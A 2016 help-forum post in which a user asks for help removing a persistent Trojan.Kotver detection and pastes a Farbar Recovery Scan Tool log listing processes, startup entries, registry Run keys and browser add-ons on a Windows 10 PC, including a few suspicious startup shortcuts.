Infected with Trojan.Kotver!gm2 - Need some help!!!


  • This topic is locked
16 replies to this topic

#1 brokus4

Posted 30 October 2016 - 06:41 PM

Hello! I'm glad I found this Forum and I hope someone can help me. Norton is identifying "Trojan.Kotver!gm2" and saying that it will be resolved with a restart, but I restart and run the Quick Scan again and it is still there. I tried to use their Power Eraser product, but it said there was nothing present. So, I found this forum and followed the direction to remove this trojan on my own. The Symantec software said "Trojan.Kotver has not been found on your computer.", so I went on and ran the ESET online scanner and it too said there was no malware present. I once again restarted my computer and did the Norton Quick Scan again and it is telling me that "Trojan.Kotver!gm2" is still present.

So, following the instructions, I've downloaded and run the Farbar Recovery Scan Tool. Below is the FRST.txt log file and attached is the Addition.txt file. Can anyone help with this?

Thank you in advance!

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-10-2016
Ran by Harold (administrator) on FAMILY-HP (30-10-2016 18:31:56)
Running from C:\Users\Harold\Desktop
Loaded Profiles: Harold & DefaultAppPool (Available Profiles: Harold & Sue & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 9 Organizer\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpertService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
() C:\Program Files (x86)\Dokan\DokanLibrary\mounter.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\SeagateManager\Sync\FreeAgentService.exe
(Garmin Ltd. or its subsidiaries) C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\n360.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Roxio) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
() C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpert.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\n360.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
() C:\Program Files\GoPro\GoPro Desktop App\GoProDesktopSystemTray.exe
(Spotify Ltd) C:\Users\Harold\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Dropbox, Inc.) C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe
(Seagate LLC) C:\Program Files (x86)\Seagate\SeagateManager\FreeAgent Status\stxmenumgr.exe
(iSkySoft) C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
() C:\Program Files\GoPro\GoPro Desktop App\GoProDeviceDetection.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\conathst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [611896 2010-09-15] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [497648 2010-07-29] (Adobe Systems Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-07] (Apple Inc.)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-22] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\nvspcap64.dll [1859936 2016-01-22] (NVIDIA Corporation)
HKLM\...\Run: [GoPro Tray App] => C:\Program Files\GoPro\GoPro Desktop App\GoProDesktopSystemTray.exe [1088944 2016-05-12] ()
HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54576 2008-12-08] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HP Remote Solution] => C:\Program Files (x86)\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe [656896 2009-08-24] (Hewlett-Packard)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [MaxMenuMgr] => C:\Program Files (x86)\Seagate\SeagateManager\FreeAgent Status\StxMenuMgr.exe [185640 2009-05-01] (Seagate LLC)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [658424 2011-05-06] (PDF Complete Inc)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft)
HKLM-x32\...\Run: [DelaypluginInstall] => C:\ProgramData\iSkysoft\Video Converter Ultimate\DelayPluginI.exe
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1563424 2016-04-05] (Seagate Technology LLC)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [Spotify Web Helper] => C:\Users\Harold\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1199000 2013-02-26] (Spotify Ltd)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [Dropbox Update] => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [127816 2016-04-05] (Seagate Technology LLC)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2736128 2010-11-22] (Hewlett-Packard Company)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\PhotoScreensaver.scr [572416 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt.1.0.dll [2016-10-24] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snapfish PictureMover.lnk [2011-03-05]
ShortcutTarget: Snapfish PictureMover.lnk -> C:\Program Files (x86)\PictureMover\Bin\PictureMover.exe (Hewlett-Packard Company)
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]
ShortcutTarget: ae5a3b.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk [2016-10-08]
ShortcutTarget: d433f5.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-10-29]
ShortcutTarget: Dropbox.lnk -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{4749b311-6a08-4bf2-9356-27fee05b93a1}: [DhcpNameServer] 209.18.47.61 209.18.47.62

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=21.6.0.32
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE01&ocid=UE01DHP
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPDSK/1
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NSBU&chn=1000&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll [2014-03-11] (Microsoft Corporation.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\ssv.dll [2015-03-03] (Oracle Corporation)
BHO-x32: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\PROGRA~3\iSkysoft\VIDEOC~1\WSBROW~1.DLL => No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll [2014-03-11] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\jp2ssv.dll [2015-03-03] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll [2014-03-11] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll [2014-03-11] (Microsoft Corporation.)
DPF: HKLM-x32 {BEA7310D-06C4-4339-A784-DC3804819809} hxxp://images3.pnimedia.com/ProductAssets/costcous/activex/v3_0_0_7/PhotoCenter_ActiveX_Control.cab
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File

FireFox:
========
FF ProfilePath: C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default [2016-10-30]
FF user.js: detected! => C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js [2016-03-26]
FF Homepage: Mozilla\Firefox\Profiles\be2mjg6m.default -> hxxp://www.yahoo.com/
FF Extension: (20-20 3D Viewer - WEB) - C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\Extensions\2020Player_WEB@2020Technologies.com [2014-08-01] [not signed]
FF Extension: (Garmin Communicator) - C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\Extensions\{195A3098-0BD5-4e90-AE22-BA1C540AFD1E} [2016-05-01]
FF Extension: (Java Console) - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2016-10-23] [not signed]
FF Extension: (Java Console) - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2016-10-23] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.0.124\coFFAddon
FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.0.124\coFFAddon [2016-10-16]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.0.124\coFFAddon
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_205.dll [2016-10-29] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_205.dll [2016-10-29] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2012-05-01] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.40.2 -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\dtplugin\npDeployJava1.dll [2015-03-03] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.40.2 -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll [2015-03-03] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-13] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1355648730-1136835254-2900194302-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll [No File]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-16]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-16]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

